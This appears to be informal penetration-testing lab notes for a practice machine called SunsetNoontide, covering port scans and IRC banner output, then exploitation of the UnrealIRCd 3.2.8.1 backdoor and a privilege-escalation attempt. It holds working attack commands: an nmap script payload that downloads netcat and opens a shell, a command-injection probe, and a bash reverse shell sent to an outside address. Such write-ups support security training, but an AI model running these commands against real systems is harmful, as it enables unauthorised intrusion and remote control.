SunsetNoontide

6667/tcp open   irc           UnrealIRCd (Admin email example@example.com)
6697/tcp open   irc           UnrealIRCd (Admin email example@example.com)
8067/tcp open   irc           UnrealIRCd (Admin email example@example.com)

irc.foonet.com

1762/tcp  filtered landesk-rc    no-response
2467/tcp  filtered high-criteria no-response
3635/tcp  filtered sdo           no-response
6198/tcp  filtered unknown       no-response
6477/tcp  filtered unknown       no-response
6667/tcp  open     irc           syn-ack
6697/tcp  open     ircs-u        syn-ack
8067/tcp  open     infi-async    syn-ack
9030/tcp  filtered unknown       no-response
10271/tcp filtered unknown       no-response
10950/tcp filtered unknown       no-response
13410/tcp filtered unknown       no-response
17677/tcp filtered unknown       no-response
17718/tcp filtered unknown       no-response
18093/tcp filtered unknown       no-response
18958/tcp filtered unknown       no-response
19099/tcp filtered unknown       no-response
20694/tcp filtered unknown       no-response
21419/tcp filtered unknown       no-response
21776/tcp filtered unknown       no-response
22163/tcp filtered unknown       no-response
23479/tcp filtered unknown       no-response
24163/tcp filtered unknown       no-response
24708/tcp filtered unknown       no-response
27212/tcp filtered unknown       no-response
28705/tcp filtered unknown       no-response
29041/tcp filtered unknown       no-response
29284/tcp filtered unknown       no-response
29328/tcp filtered unknown       no-response
29379/tcp filtered unknown       no-response
30454/tcp filtered unknown       no-response
30727/tcp filtered unknown       no-response
30945/tcp filtered unknown       no-response
31143/tcp filtered unknown       no-response
33178/tcp filtered unknown       no-response
34136/tcp filtered unknown       no-response
36069/tcp filtered unknown       no-response
36563/tcp filtered unknown       no-response
36669/tcp filtered unknown       no-response
37282/tcp filtered unknown       no-response
37405/tcp filtered unknown       no-response
44541/tcp filtered unknown       no-response
45688/tcp filtered unknown       no-response
46882/tcp filtered unknown       no-response
48176/tcp filtered unknown       no-response
48444/tcp filtered unknown       no-response
49921/tcp filtered unknown       no-response
49956/tcp filtered unknown       no-response
50004/tcp filtered unknown       no-response
51241/tcp filtered unknown       no-response
52501/tcp filtered unknown       no-response
52829/tcp filtered unknown       no-response
54248/tcp filtered unknown       no-response
54265/tcp filtered unknown       no-response
54343/tcp filtered unknown       no-response
55195/tcp filtered unknown       no-response
55296/tcp filtered unknown       no-response
55307/tcp filtered unknown       no-response
56166/tcp filtered unknown       no-response
56575/tcp filtered unknown       no-response
57240/tcp filtered unknown       no-response
57296/tcp filtered unknown       no-response
57532/tcp filtered unknown       no-response
58694/tcp filtered unknown       no-response
60525/tcp filtered unknown       no-response
61596/tcp filtered unknown       no-response
61894/tcp filtered unknown       no-response
63239/tcp filtered unknown       no-response

irc.foonet.com 002 unko123 :Your host is irc.foonet.com, running version Unreal3.2.8.1
:irc.foonet.com 003 unko123 :This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
:irc.foonet.com 004 unko123 irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.foonet.com 005 unko123 UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irc.foonet.com 005 unko123 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irc.foonet.com 005 unko123 EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.foonet.com 251 unko123 :There are 1 users and 0 invisible on 1 servers
:irc.foonet.com 255 unko123 :I have 1 clients and 0 servers
:irc.foonet.com 265 unko123 :Current Local Users: 1  Max: 1
:irc.foonet.com 266 unko123 :Current Global Users: 1  Max: 1
:irc.foonet.com 422 unko123 :MOTD File is missing

:irc.foonet.com 256 unko123 :Administrative info about irc.foonet.com
:irc.foonet.com 257 unko123 :Bob Smith
:irc.foonet.com 258 unko123 :bob
:irc.foonet.com 258 unko123 :widely@used.name

Used a technique of

Full nmap scanning shows there's port 8067

it's looking up the host name?

Unreal3.2.8.1

https://www.infosecmatter.com/nmap-nse-library/?nse=irc-unrealircd-backdoor

nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' 10.129.1.108

echo "AB; ping -c 192.168.49.130" | nc 192.168.130.120 8067

tcpdump -i tun1 icmp -v

comfirmed that we can do command execution

echo "AB; bash -c 'bash -i >& /dev/tcp/192.168.49.130/9001 0>&1'" | nc 192.168.130.120 8067

Explanation: Sometimes, linux may not be in the bash mode, so we told the engine to go to the bash mode with "bash -c" before executing the command"

got a reverse shell:

Prev Esc:

```

[+] [CVE-2019-13272] PTRACE_TRACEME

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: highly probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.

I tried this exploit but didn't work. looks like it's a metasploit module.

Then I tried to login to root with password root and got in!

PreviousHutchNextMice (Windows)

Last updated